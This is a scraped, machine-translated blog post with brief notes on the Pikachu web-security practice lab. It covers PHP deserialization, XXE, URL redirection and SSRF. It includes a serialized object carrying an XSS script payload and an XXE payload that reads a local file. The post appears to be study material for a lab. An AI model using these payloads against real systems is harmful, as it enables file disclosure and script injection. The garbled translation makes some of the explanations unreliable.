pakachu-php deserialization / xee vulnerability / url redirection / ssrf

Others 2020-03-31 15:48:58 views: null
php deserialization
Serialization serialize () is to an object can be transferred into a string, an object such as the following:
Deserialization to unserialize () it is to be reduced to a sequence of the target string, and then continue to use the following code.
Enter the code 
O:1:"S":1:{s:4:"test";s:29:"<script>alert('aaa')</script>";}

 

 

xee Vulnerability
XXE, "xml external entity injection", that is "xml external entity injection vulnerability"
Submit a normal data 
<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY hacker "ma">
]>
<name>&hacker;</name>

 

Submit malicious code 
<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///C://pig.txt">
]>
<x>&f;</x>

 

 

 

url redirection
Url will be replaced by another address

 

 

ssrf(curl)
Url is the problem, change the address directly

 

 

file_get_content
And almost on a direct path to change the line

Guess you like

Origin www.cnblogs.com/zhao-yang/p/12605306.html
Recommended
Ranking
vue project automated build tools 1.0, support for multi-page build
JDBC add, update, delete data
SpringCloud combat service in response to the decline tutorial series (Chapter IV)
A segmentation fault (core dumped) error occurs when C+11 compiles and calls the PCL library
Django achieve websocket
Go语言并发之道--笔记1
Three-tier structure and application
Zhejiang data structure after-school exercise practice two 7-2 Reversing Linked List (25 points)
Front-end interview brushing day9 (updated daily high-frequency inspection points for front-end interviews)
The difference between the shell of the single and double quote
Daily
More
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)

Code World

© 2018 codetd.com